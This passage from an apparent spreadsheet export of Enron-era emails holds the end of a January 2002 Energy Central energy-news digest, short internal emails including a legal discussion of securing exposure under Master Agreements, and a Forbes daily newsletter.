len energy trader Enron Corp.      Rates     Critics Voice Opinions on Neva=_x000D_
da Power's Rate Increase   By John G. Edwards, Las Vegas Review-Journal, Ja=_x000D_
n. 16 An angry crowd of 175 people Tuesday night cheered on critics of Neva=_x000D_
da Power Co. who blamed the company's request to boost rates $922 million o=_x000D_
n its own "ghastly errors" and "greed."       Home Power Rates Will Stay Hi=_x000D_
gh, Utility Head Tells Vancouver, Wash., Council   By Allan Brettmann, The =_x000D_
Oregonian, Portland, Ore., Jan. 15 Electricity prices throughout the West h=_x000D_
ave stabilized, but that won't translate into lower residential rates for a=_x000D_
t least two years, the head of Clark Public Utilities predicted Monday nigh=_x000D_
t.       Utility Costs in West Virginia Rose 6.6 Percent in 2001, State Law=_x000D_
makers Learn   By Phil Kabler, The Charleston Gazette, W.Va., Jan. 15 State=_x000D_
 residents' costs for electric, gas, water and telephone utilities jumped a=_x000D_
n average of 6.6 percent in 2001, Public Service Commission Consumer Advoca=_x000D_
te Billy Jack Gregg said Monday.      General     U.S. Senator from Texas M=_x000D_
ay Aid Enron Workers   By Jack Douglas Jr., Fort Worth Star-Telegram, Texas=_x000D_
, Jan. 16 Sen. Kay Bailey Hutchison is considering giving away some of the =_x000D_
campaign contributions she received from Enron if the money could help empl=_x000D_
oyees of the collapsed energy trading company, she said Monday.       Some =_x000D_
Bush Officials Sold Enron Stock Before Bankruptcy   By Patty Reinert, Houst=_x000D_
on Chronicle, Jan. 16 Government ethics rules forced Bush administration of=_x000D_
ficials to sell their Enron Corp. stock last year, a move that, in the end,=_x000D_
 spared them hundreds of thousands of dollars in losses when the Houston en=_x000D_
ergy giant imploded.       Enron Made Campaign Contributions to Some North =_x000D_
Carolina Politicians   By Paul B. Johnson, High Point Enterprise, N.C., Jan=_x000D_
. 15 Rep. Howard Coble is one of four congressmen from North Carolina who r=_x000D_
eceived contributions from the bankrupt Enron Corp., reports a pair of camp=_x000D_
aign-finance tracking organizations.       Andersen rushes out ads in try t=_x000D_
o boost confidence   NEW YORK, Jan 16 (Reuters) A week after it was found t=_x000D_
hat Andersen destroyed documents that could be crucial to the government's =_x000D_
probe into Enron Corp.'s collapse, the accounting firm on Wednesday took ou=_x000D_
t full-page ads in major U.S. newspapers to attempt to restore confidence i=_x000D_
n its business practices.       Enron whistleblower also warned Andersen-la=_x000D_
wmakers   WASHINGTON, Jan 16 (Reuters) Sherron Watkins, the Enron Corp. exe=_x000D_
cutive who warned the company's chairman of troubling accounting practices,=_x000D_
 also spoke to the former energy giant's auditor last August, U.S. lawmaker=_x000D_
s said on Wednesday.       Enron's Woes Don't Worry Jenkintown, Pa., Subsid=_x000D_
iary's Workers   By Margie Fishman, The Philadelphia Inquirer, Jan. 16 Will=_x000D_
iard Inc. employees in Jenkintown are following the news blitz about the ma=_x000D_
ssive bankruptcy and investigation of their parent company, energy trader E=_x000D_
nron Corp., with interest but little immediate concern.       Oregon Senato=_x000D_
r Donates Money Received from Enron to Former Workers   By Tom Detzel, The =_x000D_
Oregonian, Portland, Ore., Jan. 15 Sen. Gordon Smith, R-Ore., who's taken i=_x000D_
n more Enron campaign cash than any Oregon politician, said Monday he'll do=_x000D_
nate the money to Enron workers whose retirement accounts shriveled with th=_x000D_
e company's stock.       Ex-Enron Employee Hawking Manual   By KRISTEN HAYS=_x000D_
 Associated Press Writer, HOUSTON, Jan 16, 2002 (AP Online via COMTEX) -- G=_x000D_
etting laid off from Enron Corp. turned Matt Mitchell into an entrepreneur.=_x000D_
      Trading/Marketing     UBS Wuffli says Enron trading ops acquisition d=_x000D_
iversification not new strategy   ZURICH, Jan 16, 2002 (AFX-Europe via COMT=_x000D_
EX) --  UBS AG president Peter Wuffli said UBS Warburg's acquisition of Enr=_x000D_
on Corp wholesale energy trading operations represents a diversification of=_x000D_
 already existing trading technology and risk management, not a new strateg=_x000D_
y.       Buffalo, N.Y., Group to Market Electric Power   By Chet Bridger, T=_x000D_
he Buffalo News, N.Y., Jan. 15 The marketing organization established to lu=_x000D_
re businesses to the Buffalo Niagara region has a new tool in its arsenal: =_x000D_
electric power.      New Technologies/Markets     Workers Return to Torring=_x000D_
ton, Conn.-Based Fuel-Cell Plant after Explosion   By David A. Smith, Water=_x000D_
bury Republican-American, Conn., Jan. 16 Employees at FuelCell Energy Inc. =_x000D_
returned Tuesday morning to the Technology Park Drive plant as company offi=_x000D_
cials and local authorities tried to pin down exactly how fumes from a mach=_x000D_
ine might have caused the Monday night explosion that injured five employee=_x000D_
s.      Power Pricing/Supply     West Power Gets Early Boost from Outages, =_x000D_
Ends Session Low   Jan. 16 (Btu's Daily Power Report) Power prices througho=_x000D_
ut the Western U.S. received a modest boost early in the session today as p=_x000D_
ackages were traded for Thursday/Friday delivery due to the upcoming Martin=_x000D_
 Luther King Jr. holiday on Monday (1/21). Special Offer from this Publishe=_x000D_
r!        A Chill Envelopes Power Markets   Jan. 16 (Special to Western Pri=_x000D_
ce Survey Contacts) The weather was clear, bright and cold this week, sendi=_x000D_
ng natural gas and electricity prices higher midweek. Special Offer from th=_x000D_
is Publisher!        Andersen Partners Feel the Heat   Jan. 15 (Energy Mark=_x000D_
et Report) Day-ahead peak power prices continued to rise in the Western U.S=_x000D_
. Tuesday amid expectations of stronger weather-related demand and higher n=_x000D_
atural gas values. Special Offer from this Publisher!       Transmission &amp; =_x000D_
Reliability     Nevada Hydro Wants Simplified Power-Line Review Process in =_x000D_
Southern California   By William Finn Bennett, North County Times, Escondid=_x000D_
o, Calif., Jan. 15 The company working with Elsinore Valley Municipal Water=_x000D_
 District to build a proposed transmission power line between Riverside Cou=_x000D_
nty and San Diego County is recommending a single environmental review proc=_x000D_
ess for its own project and a competing San Diego Gas &amp; Electric project.  =_x000D_
    Power Projects     Kaysville, Utah, Power Plant Plans for Increased Sum=_x000D_
mer Use   By Ruth Malan, Standard-Examiner, Ogden, Utah, Jan. 16 Kaysville =_x000D_
is spending this winter planning for the city's inevitable increase in powe=_x000D_
r use during summer months.       Enron Abandons Mexican Generation Project=_x000D_
   MEXICO CITY, Jan 15, 2002 (El Universal/Corporate Mexico by Internet Sec=_x000D_
urities, Inc. via COMTEX) --  Enron abandoned its project to construct a 28=_x000D_
4-megawatt electric cogeneration plant that it had already agreed to with M=_x000D_
exico's federal government, reported Mexico City daily el Universal.       =_x000D_
Virginia SCC Sends Tenaska Power Plant Application Back To Hearing Examiner=_x000D_
 For Further Review   RICHMOND, Va., Jan 16, 2002 (U.S. Newswire via COMTEX=_x000D_
) -- The State Corporation Commission (SCC) is not yet ready to decide whet=_x000D_
her a 900-megawatt power plant should be built in Fluvanna County.      Leg=_x000D_
al     Texas Agency Sues to Block Utility Panel's Deals   By R.A. Dyer, For=_x000D_
t Worth Star-Telegram, Texas, Jan. 15 The Texas Public Utility Commission h=_x000D_
as been sued over deals that set fallback electric service for some of the =_x000D_
state's poorest residents.       INTERVIEW-Nikko unit may mull legal action=_x000D_
 over Enron   TOKYO, Jan 17 (Reuters) - The new president of Nikko Cordial =_x000D_
Corp's asset management unit -- a major Japanese victim of Enron Corp's fai=_x000D_
lure -- said on Wednesday his company may consider taking legal action agai=_x000D_
nst the U.S. energy trader.       Energy company sues Andersen; experts exp=_x000D_
ect many more suits for accounting firm   By ALAN CLENDENNING AP Business W=_x000D_
riter, NEW YORK, Jan 16, 2002 (AP WorldStream via COMTEX) -- An energy comp=_x000D_
any has sued Arthur Andersen LLP, the accounting firm that issued audits fo=_x000D_
r Enron Corp., and experts predict that Andersen will soon face a rash of s=_x000D_
imilar lawsuits accusing it of complicity in Enron's spectacular collapse. =_x000D_
     Renewables     Utah Brewery Chooses Wind Power Generated in Wyoming   =_x000D_
Environmental News Network, Berkeley, Calif. , Jan. 16 A small Utah company=_x000D_
 brews award-winning beers such as Cutthroat Pale Ale and Kings Peak Porter=_x000D_
, and now it's doing it with power generated by the strong winds of Wyoming=_x000D_
.       Love your electric bill, Wisconsin cities say in ad drive   Jan. 14=_x000D_
 (Public Power Weekly) Customers participating in Wisconsin Public Power In=_x000D_
c.?s renewable energy program are enamored with their electric bills.  Spec=_x000D_
ial Offer from this Publisher!        NORTH CAROLINA UTILITIES BACK STATEWI=_x000D_
DE GREEN POWER PROGRAM   Jan. 11 (Wind Energy Weekly) Large utilities in No=_x000D_
rth Carolina, as well as some municipal utilities and rural cooperatives, h=_x000D_
ave agreed to voluntarily participate in a statewide green power program. S=_x000D_
pecial Offer from this Publisher!       People     Las Vegas Consultant Con=_x000D_
firms Talks with Enron Chairman   By John G. Edwards, Las Vegas Review-Jour=_x000D_
nal, Jan. 16 Las Vegas consultant Sig Rogich confirmed Tuesday that he spok=_x000D_
e with Enron Corp. Chairman Kenneth Lay as the Houston-based company strugg=_x000D_
led to avoid financial collapse this fall.      Labor/Human Resources     O=_x000D_
ntario Power to cut 2,000 jobs for deregulation   TORONTO, Jan 16 (Reuters)=_x000D_
 Ontario Power Generation said on Wednesday it would lay off about 20 perce=_x000D_
nt of its workforce to improve profitability as the province's electricity =_x000D_
market opens up for competition on May 1.      Environmental     Justice De=_x000D_
partment to Prosecute 8 Utilities for Violating Clean-Air Regulation   By S=_x000D_
eth Borenstein, Knight Ridder Washington Bureau, Jan. 16 The Justice Depart=_x000D_
ment declared Tuesday it would go ahead and prosecute eight utilities for v=_x000D_
iolating a major clean air regulation, even though the Bush administration =_x000D_
wants to ease the rule.      Nuclear     Govt. Reports on Missing Nuke Fuel=_x000D_
   By DIANE SCARPONI Associated Press Writer, WATERFORD, Conn., Jan 16, 200=_x000D_
2 (AP Online via COMTEX) -- Two radioactive fuel rods missing from a nuclea=_x000D_
r power plant for at least two decades were likely mistaken for other radio=_x000D_
active waste and safely disposed of, federal investigators have concluded. =_x000D_
      Neighbors of Florida Nuclear Plants Won't Get Anti-Radiation Pills   =_x000D_
By Alex Leary, St. Petersburg Times, Fla., Jan. 15 In what is becoming a gr=_x000D_
owing controversy, the state likely will reject an offer to provide free ra=_x000D_
diation-blocking pills to thousands of people living near Florida's three n=_x000D_
uclear power plants.       U.S. May Upgrade Background Checks of Nuclear Po=_x000D_
wer Plant Workers   By Sean Adkins, York Daily Record, Pa., Jan. 15 Chances=_x000D_
 are the Nuclear Regulatory Commission has subjected your name to a backgro=_x000D_
und check if you have visited Three Mile Island Generating Station or Peach=_x000D_
 Bottom Atomic Power Station within the last few years.       Pbmr Pilot Pr=_x000D_
oject Taken Forward   Jan 16, 2002 - Africa News Service THE construction o=_x000D_
f SA's pilot mini-nuclear project has taken a further step forward with the=_x000D_
 appointment of US-based firm Stone &amp; Webster and two local firms to provid=_x000D_
e professional services to develop the scheme.      Financial     Enron may=_x000D_
 find it likes Pink Sheet trading   By Mark Weinraub, NEW YORK, Jan 16 (Reu=_x000D_
ters) Collapsed energy trading firm Enron Corp., under heavy scrutiny for t=_x000D_
he accounting it used to polish earnings, has one thing to be thankful for:=_x000D_
 It does not have to report its financial performance anymore.       Enron =_x000D_
joins attacks, economy as earnings excuse   By Denise Duclaux, NEW YORK, Ja=_x000D_
n 16 (Reuters) When Enron Corp. threw in the towel to file for the biggest =_x000D_
U.S. bankruptcy ever late last year, the fallen energy trader left companie=_x000D_
s ranging from banks to dairies nursing bumps and bruises.       Feds Study=_x000D_
 Enron Effect on Economy   By RON FOURNIER, WASHINGTON, Jan 16, 2002 (AP On=_x000D_
line via COMTEX) --  White House economic adviser Larry Lindsey studied the=_x000D_
 economic impact of the potential collapse of Enron Corp. as the Texas-base=_x000D_
d energy firm struggled for its financial life, the Bush administration dis=_x000D_
closed Wednesday.       Enron, Andersen bond went beyond auditing   By KRIS=_x000D_
TEN HAYS Associated Press Writer, HOUSTON, Jan 15, 2002 (AP WorldStream via=_x000D_
 COMTEX) -- Arthur Andersen LLP didn't just monitor Enron Corp.'s books.   =_x000D_
   Financial - Ratings     RESEARCH ALERT-Morgan Stanley rates Alliant Ener=_x000D_
gy 'neutral'   NEW YORK, Jan 16 (Reuters) Morgan Stanley on Wednesday began=_x000D_
 coverage on Alliant Energy Corp. with a "neutral" rating, calling the comp=_x000D_
any "a solid, regulated business with upside potential from unregulated gen=_x000D_
eration, international energy, and E?operations."      Financial - Results =_x000D_
    Calpine cuts 2002 capital spending, revises outlook   LOS ANGELES, Jan =_x000D_
16 (Reuters) - Independent power producer Calpine Corp. on Wednesday warned=_x000D_
 earnings for the year would fall sharply below Wall Street forecasts as it=_x000D_
 slashes up to $2 billion in capital spending and postpones plans to build =_x000D_
34 new plants.       Dominion to meet or exceed 2001 estimates   RICHMOND, =_x000D_
Va., Jan 16 (Reuters) - Dominion Resources Inc., one of the largest U.S. en=_x000D_
ergy producers, on Wednesday said its 2001 earnings before special charges =_x000D_
will meet or exceed Wall Street expectations.      International     Korea'=_x000D_
s public hearing on KEPCO unit sale aborted   By Park Sung-woo, SEOUL, Jan =_x000D_
16 (Reuters) The push by state-run Korea Electric Power Corp (KEPCO) to sel=_x000D_
l power generation units stalled on Wednesday when about 30 demonstrators b=_x000D_
locked a public hearing on the plan.       Controversy thickens for Enron I=_x000D_
ndian arm   By INDRAJIT BASU, UPI Business Correspondent, CALCUTTA, India, =_x000D_
Jan 16, 2002 (United Press International via COMTEX) --  Lately, with each =_x000D_
passing day, controversy surrounding the Dabhol Power Co., Enron's beleague=_x000D_
red Indian subsidiary, seems to be taking fresh turns.       Brazil eases e=_x000D_
nergy rationing for carnival   BRASILIA, Brazil, Jan 15, 2002 (AP WorldStre=_x000D_
am via COMTEX) --  Brazilians won't have to celebrate this year's carnival =_x000D_
in the dark.       BRE Bank announces three-step plan to rescue Elektrim   =_x000D_
Jan 16, 2002 (New World Publishing via COMTEX) --  BRE Bank, a key investor=_x000D_
 in energy and telecom conglomerate Elektrim might be on the right track to=_x000D_
 save the giant from bankruptcy, but the price will be the dismissal of cur=_x000D_
rent managers and break up of the once leading firm.       Generation Up 4.=_x000D_
1% in 2001   Peru, Jan 16, 2002 (BNamericas.com via COMTEX) --  Electricity=_x000D_
 generation in Peru totaled 1,800GWh in December, 6.2% higher than December=_x000D_
 2000, totaling 20,735GWh for the whole of 2001, a 4.1% increase on 2000, t=_x000D_
he Mines &amp; Energy Ministry announced.       Suez Group Mulls New Energy Pro=_x000D_
jects   Peru, Jan 16, 2002 (BNamericas.com via COMTEX) --  France's Suez gr=_x000D_
oup is interested in increasing its presence in Peru's energy sector and is=_x000D_
 looking at several potential projects in the country, reported Diario Gest=_x000D_
ion.       Prodi threatens to use special directive to force energy liberal=_x000D_
isation   STRASBOURG, Jan 16, 2002 (AFX-Europe via COMTEX) --  European Com=_x000D_
mission President Romano Prodi said he may use a special single market dire=_x000D_
ctive to force liberalisation of the EU's gas and electricity markets if no=_x000D_
 progress is made by member states.       Power Companies Quit Aneel Auctio=_x000D_
ns   Jan 16, 2002 - South American Business Information The appetite of the=_x000D_
 large power consuming companies for competing in the auctions of licences =_x000D_
for the construction of new power generating plants is causing the electric=_x000D_
ity companies to think twice before competing in them in the future.   [IMA=_x000D_
GE]     Powered by Energy Central   ? 2001 CyberTech, Inc. All rights reser=_x000D_
ved.  More News        Top   Excelergy    [IMAGE]  RESTRUCTURING TODAY     =_x000D_
 [IMAGE]   [IMAGE]  [IMAGE] [IMAGE] January 16, 2002     Comparison gas sho=_x000D_
pping in Ga OK with good software      Enron vets set up service firm      =_x000D_
Aquila, NiSource reveal plans to  work together      Republic opens up in T=_x000D_
exas market      Maine regulators go for political price headlines      Sem=_x000D_
pra signs Army for energy savings      MidAmerican tells of Illinois saving=_x000D_
s      Duke tells of 3 plants due next year      The Enron thing gets reall=_x000D_
y big      Calif may trim overcharge claims      Stranded cost recovery bon=_x000D_
d business wanes        Powered By US Publishing   ? 2001 US Publishing. Al=_x000D_
l Rights Reserved.  More Info     Top    [IMAGE]  RER'S EMETRIX LOAD FORECA=_x000D_
ST: CAL ISO     [IMAGE]   [IMAGE]  [IMAGE]  Actual and forecasted hourly lo=_x000D_
ad for CAL ISO.  [IMAGE]  CAL ISO Chart    Powered By RER   ? 2001 RER. All=_x000D_
 Rights Reserved.    Top    [IMAGE]  ABOUT ENERGY CENTRAL DIRECT     [IMAGE=_x000D_
]   [IMAGE]   ABOUT ENERGY CENTRAL DIRECT This e-mail summary service is pr=_x000D_
ovided FREE to qualified professionals in the power industry. This e-mail  =_x000D_
summary may be redistributed provided it is kept in its entirety.    * Clic=_x000D_
k here  to change your preferences.   * Visit Member Services  to START,  S=_x000D_
TOP, or CHANGE FORMAT for all of your e-mail subscriptions.    * To BEGIN r=_x000D_
eceiving this service directly signup at www.enerycentral.com/sections/ecdi=_x000D_
rect/ .   * To STOP receiving this service  click here   or send a message =_x000D_
to service@energycentral.com  or call Member Services at 303-782-5510.   PR=_x000D_
ESS RELEASES Submit press releases and other news to pr@energycentral.com .=_x000D_
    SPONSORSHIP AND ADVERTISING For sponsorship or advertising info call sa=_x000D_
les at 303-782-5510.    TO DELIVER YOUR ARTICLES, PAPERS, PROCEEDINGS OR MO=_x000D_
NOGRAPHS THROUGH ENERGY CENTRAL: Energy Central provides a variety of mecha=_x000D_
nisms for delivery of information to power professionals including  this e-=_x000D_
mail service, Energy Central Web Site (http://www.energycentral.com ), Ener=_x000D_
gy Central Conference Watch? and others. We can deliver your information on=_x000D_
 a promotional, subscription  or a pay-per-view basis. For more information=_x000D_
, contact Mark Johnson at 303-782-5510  mark.johnson@energycentral.com )   =_x000D_
   [IMAGE]   [IMAGE]  [IMAGE] NEW CONTENT! [IMAGE]    Include the following=_x000D_
 in your Energy Central Direct:  IntercontinentalExchange Gas Indices  See =_x000D_
the Firm Physical Natural Gas traded at over 20 hubs through the Interconti=_x000D_
nentalExchange trading platform.   Weekly Power Plays  Focused on market tr=_x000D_
ends and future price direction.  Publishes extensive price list and market=_x000D_
 analysis.         Allegro Development   [IMAGE] Itron   [IMAGE] KWI   [IMA=_x000D_
GE] Excelergy   [IMAGE] Energy Solutions Plus, Inc.   [IMAGE] RER   [IMAGE]=_x000D_
 LODESTAR CORPORATION   [IMAGE] Silicon Energy   [IMAGE] The Structure Grou=_x000D_
p   [IMAGE]   TALK TO US [IMAGE]  Ideas Wanted!  We are eager to hear your =_x000D_
ideas, feedback, and suggestions for this product.  Together we will create=_x000D_
 the most useful information tool for the electric power industry.   Partne=_x000D_
rs Wanted!  Reach over 25,000 electric power professionals with your news, =_x000D_
analysis,  commentary or insight into the industry. Call Mark Johnson at 30=_x000D_
3-782-5510       ELECTRIC POWER NEWS - TOP STORIES [IMAGE] [IMAGE]  Energy =_x000D_
Central's editors have selected these as the top stories of the day:    All=_x000D_
entown, Pa., Utility Says It Didn't Try to Control Electricity Prices  By B=_x000D_
enjamin Y. Lowe, The Philadelphia Inquirer, Jan. 16 Bankrupt PG?asks federa=_x000D_
l judge for more time to reorganize  Jan 16, 2002 - Associated Press Enron =_x000D_
energy services clients may take profit hits  By Carolyn Koo, NEW YORK, Jan=_x000D_
 16 (Reuters) FERC to create electricity market monitoring unit  WASHINGTON=_x000D_
, Jan 16 (Reuters)    Advertisement RERs Short-Term Load Forecasting System=_x000D_
s      ELECTRIC POWER NEWS - MOST REQUESTED [IMAGE] [IMAGE]  These stories =_x000D_
have been most requested by Energy Central members in the last two weeks.  =_x000D_
  Energy companies cutting plant construction -WSJ     NEW YORK, Jan 4 (Reu=_x000D_
ters)  Texas to launch electricity deregulation      By JIM FORSYTH, AUSTIN=_x000D_
, Texas, Dec 31, 2001 (United Press International via COMTEX) --  Enron Beg=_x000D_
ins to Bail on Retail Contracts; California Customers Not Yet Cut     Jan. =_x000D_
7 (California Energy Markets)  Ex-Enron Execs Launch Own Firm      By BILL =_x000D_
BERGSTROM AP Business Writer, PHILADELPHIA, Jan 14, 2002 (AP Online via COM=_x000D_
TEX) --  FEATURE-U.S. power plant cuts could be storing up trouble     By C=_x000D_
arolyn Koo, NEW YORK, Jan 7 (Reuters)    Advertisement OPEC Trial      GAS =_x000D_
INDUSTRY NEWS - TOP STORIES [IMAGE] [IMAGE]  Energy Central's editors have =_x000D_
selected these as the top stories of the day:    Energy Consultants' Study =_x000D_
Favors Canada Plan for Gas Pipelines  By Tony Hopfinger, Anchorage Daily Ne=_x000D_
ws, Alaska, Jan. 16 US FERC oks North Baja natgas pipeline project  WASHING=_x000D_
TON, Jan 16 (Reuters) US natgas pipelines to spend $68 bln on expansion  WA=_x000D_
SHINGTON, Jan 16 (Reuters)           [IMAGE]     HOME  - PERSONALIZE  - MEM=_x000D_
BER SERVICES  - ADVERTISING  - PARTNERING  - CONTACT US          Copyright =_x000D_
? 1996-2001 by CyberTech, Inc.   All rights reserved.       Energy Central_x000D_
 is a registered trademark of CyberTech, Incorporated. CyberTech does not w=_x000D_
arrant that the information or services of Energy Central will meet any spe=_x000D_
cific requirements;  nor will it be error free or uninterrupted; nor shall =_x000D_
CyberTech be liable for any indirect, incidental or  consequential damages =_x000D_
(including lost data, information or profits) sustained or incurred in conn=_x000D_
ection with the  use of, operation of, or inability to use Energy Central. =_x000D_
Contact: 303-782-5510 or service@energycentral.com       =09_x000D_
</t>
  </si>
  <si>
    <t>Mon, 8 Nov 1999 05:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ted.bockius@compaq.com'})</t>
  </si>
  <si>
    <t>your request</t>
  </si>
  <si>
    <t xml:space="preserve"> - resume.doc</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 11:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: LIPA Discussions Letter</t>
  </si>
  <si>
    <t xml:space="preserve">Looks good_x000D_
_x000D_
_x000D_
_x000D_
	Steve Van Hooser_x000D_
	11/28/2000 11:34 AM_x000D_
		 _x000D_
		 To: Richard Sanders_x000D_
		 cc: _x000D_
		 Subject: LIPA Discussions Letter_x000D_
_x000D_
Richard,_x000D_
_x000D_
How does this look?  If I can get a few minutes with Mark H. today, I'm going _x000D_
to propose that I speak to Stan Klimberg about getting this signed before _x000D_
Thursday's meeting with LIPA.  Thanks for your help this morning._x000D_
_x000D_
Steve_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 7 Nov 2000 09:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Security under Master Agreements</t>
  </si>
  <si>
    <t xml:space="preserve">I think you pose an interesting legal issue.  I believe there is caselaw on _x000D_
this in the states.  We have a variation on this in some agreements in that _x000D_
if exposure exceeds x, then collateral must be posted.  I will be interested _x000D_
in the responses you get._x000D_
_x000D_
Regards,_x000D_
_x000D_
Mark_x000D_
_x000D_
_x000D_
_x000D_
	Peter Keohane_x000D_
	Sent by: Sharon Crawford_x000D_
	11/07/2000 04:17 PM_x000D_
		 _x000D_
		 To: Mark E Haedicke/HOU/ECT@ECT_x000D_
		 cc: Mark Taylor/HOU/ECT@ECT, Jeffrey T Hodge/HOU/ECT@ECT, Chris _x000D_
Gaffney/TOR/ECT@ECT, Greg Johnston/CAL/ECT@ECT, Mark Powell/CAL/ECT@ECT, Rob _x000D_
Milnthorp/CAL/ECT@ECT, mhb@blakes.com_x000D_
		 Subject: Security under Master Agreements_x000D_
_x000D_
Mark, Rob Milnthorp has asked me to consider whether there is an artful way _x000D_
under our Master Agreements that upon certain occurrences we could elevate _x000D_
our exposure from unsecured to secured, particularly in circumstances where, _x000D_
for whatever reason, we have not received letters of credit or other _x000D_
collateral.  My thought is to insert a clause in our Master Agreements in the _x000D_
nature of a "floating charge"._x000D_
_x000D_
The problem with this concept is that it may be resisted within the _x000D_
industry.  For example, certain counterparties, i.e. a financial institution _x000D_
or a near-financial institution, such as a bank, a brokerage, a trading _x000D_
institution, etc., would not likely be willing to provide us with security _x000D_
over their assets.  In general, counterparties will also have concerns with _x000D_
granting security over their assets, particularly as that security may have _x000D_
restricting consequences for their treasury/banking relationships and _x000D_
covenants, and/or on their ability to conduct business, including disposing _x000D_
of assets which may then require our consent.  In addition, it would likely _x000D_
be necessary to introduce this concept on a bilateral basis, such that it _x000D_
would also be binding on us in similar circumstances.  (Counterparties could _x000D_
go so far as requiring this concept in our Enron Corp. guarantees.)_x000D_
_x000D_
For example, in the natural gas business in Canada at least, older form _x000D_
marketing agreements and agreements used by gas aggregators with gas _x000D_
producers used "reserved dedication" covenants, whereby reserves were _x000D_
dedicated to a particular contract.  These covenants did not, however, create _x000D_
security, to avoid the complicating issues addressed above.  To the extent _x000D_
that the reserves were not available, the marketer/aggregator could have a _x000D_
claim, on an unsecured basis, for breach of covenant, but was not in a _x000D_
secured position.  I do not believe we want to go to this type of concept._x000D_
_x000D_
However, we may be able to think of some creative way whereby the _x000D_
counterparty is free to deal with us (and we are free to deal with them) on _x000D_
an unsecured basis, subject to our standard collateralization requirements, _x000D_
but also provide that upon the occurrence of a particularly serious event, _x000D_
such as a Material Adverse Change, a Triggering Event, an Event of Default, _x000D_
etc., the security automatically takes place.  We would need to consider _x000D_
whether such a "prospective" security interest could be made to work and be _x000D_
enforceable._x000D_
_x000D_
I have discussed this concept on a preliminary basis with Rob Milnthorp and _x000D_
Mungo Hardwicke-Brown of the Blake firm to see if we could create a _x000D_
relatively simple clause to be inserted into our Master Agreements which _x000D_
artfully deals with this issue.  In essence, the idea would be to get _x000D_
ourselves in a position of being one step ahead of all of the unsecured _x000D_
creditors in the event there is an insolvency._x000D_
_x000D_
Would you please let me know whether you think this is a worthwhile project _x000D_
or whether we have considered such a thing in the past in Houston.  As noted _x000D_
above, the clause would have to be one that could be "sold" to counterparties _x000D_
and be acceptable to us on a bilateral basis (and that may well not be _x000D_
possible).  If you believe that it is a worthwhile project, I will continue _x000D_
to work with Mungo Hardwicke-Brown to see if we can come up with something.  _x000D_
If you do not believe that it is a worthwhile project or have considered this _x000D_
idea in the past and found it to be unworkable, please let me know, and we _x000D_
will not work on it further._x000D_
_x000D_
Regards,_x000D_
Peter_x000D_
</t>
  </si>
  <si>
    <t>Mon, 12 Nov 2001 17:00:57 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'412162.167547968.1@news.forbesdigital.com'})</t>
  </si>
  <si>
    <t>Forbes Daily: China Is In</t>
  </si>
  <si>
    <t>FORBES.COM DAILY NEWSLETTER NOVEMBER 12, 2001 _x000D_
----------------------------------------------_x000D_
  *China Is In_x000D_
  *Burning Different DVDs_x000D_
  *Stock Focus: Discount Retailers Expect Happy Holidays_x000D_
  *Auto Sales: Into The Abyss_x000D_
  *Lifestyle: Porsche Makes the Carrera Better Than Ever_x000D_
_x000D_
=================================================================_x000D_
==========================ADVERTISEMENT==========================_x000D_
ARE HIGH WARRANTY COSTS AFFECTING YOUR COMPANY'S PROFITABILITY? _x000D_
The IMMUNE System from Syncata and HNC Software can rapidly and _x000D_
automatically detect part failure before costly recalls erase _x000D_
profits and damage your brand.  Reduce your warranty claims and _x000D_
maintenance costs.  Learn how IMMUNE can benefit your company.  _x000D_
Receive a free demo today.   Visit: _x000D_
http://tm0.com/forbes/sbct.cgi?s=167547968&amp;i=412162&amp;d=2008181_x000D_
=================================================================_x000D_
_x000D_
CHINA IS IN_x000D_
Dan Ackman_x000D_
China finally enters the WTO, bringing its billions of people _x000D_
closer to the rest of the world._x000D_
http://tm0.com/forbes/sbct.cgi?s=167547968&amp;i=412162&amp;d=2008182_x000D_
_x000D_
BURNING DIFFERENT DVDS_x000D_
11.12.01, 10:00 AM ET - Arik Hesseldahl_x000D_
Recordable DVDs have sold slowly, thanks to competing tech. Will _x000D_
Panasonic's new burner sort it out? _x000D_
http://tm0.com/forbes/sbct.cgi?s=167547968&amp;i=412162&amp;d=2008183_x000D_
_x000D_
STOCK FOCUS: DISCOUNT RETAILERS EXPECT HAPPY HOLIDAYS_x000D_
11.12.01, 9:00 AM ET - Jody Yen_x000D_
Shoppers are likely to be in a somber mood this year, but some _x000D_
stores have what consumers want. _x000D_
http://tm0.com/forbes/sbct.cgi?s=167547968&amp;i=412162&amp;d=2008184_x000D_
_x000D_
=================================================================_x000D_
==========================ADVERTISEMENT==========================_x000D_
Securing Your Network From Disaster_x000D_
Data and information are your enterprise's most valuable assets, _x000D_
and protecting them is critical today. AT&amp;T leverages the world's _x000D_
most reliable security and business continuity measures to keep _x000D_
your operations running - even in the event of a disaster. For _x000D_
security solutions that deliver an impressive Return on _x000D_
Communications, click here._x000D_
http://tm0.com/forbes/sbct.cgi?s=167547968&amp;i=412162&amp;d=2008185_x000D_
=================================================================_x000D_
_x000D_
AUTO SALES: INTO THE ABYSS_x000D_
11.12.01, 8:00 AM ET - Jerry Flint_x000D_
With only two months to go, it's hard to predict 2001 auto sales. _x000D_
Next year? Things will be very rough. _x000D_
http://tm0.com/forbes/sbct.cgi?s=167547968&amp;i=412162&amp;d=2008186_x000D_
_x000D_
LIFESTYLE: PORSCHE MAKES THE CARRERA BETTER THAN EVER_x000D_
11.12.01, 12:01 AM ET - Michael Frank_x000D_
What makes it so good? It's faster than any previous Carrera and _x000D_
easier to drive. _x000D_
http://tm0.com/forbes/sbct.cgi?s=167547968&amp;i=412162&amp;d=2008187_x000D_
_x000D_
------------------------------------------------------------------_x000D_
HOW TO SUBSCRIBE &amp; UNSUBSCRIBE_x000D_
_x000D_
To SUBSCRIBE to any FORBES.COM newsletter, join us as a member _x000D_
at:_x000D_
http://tm0.com/forbes/sbct.cgi?s=167547968&amp;i=412162&amp;d=2008190_x000D_
_x000D_
UNSUBSCRIBING FROM A NEWSLETTER_x000D_
Forbes.com members who selected newsletters when they signed up _x000D_
or on their edit profile page can unsubscribe at:_x000D_
http://tm0.com/forbes/sbct.cgi?s=167547968&amp;i=412162&amp;d=2008189_x000D_
_x000D_
If you are not a member, or did not select newsletters on our _x000D_
membership pages, you can UNSUBSCRIBE to this newsletter by _x000D_
simply replying to this message and changing the message's _x000D_
subject heading to "Unsubscribe". _x000D_
_x000D_
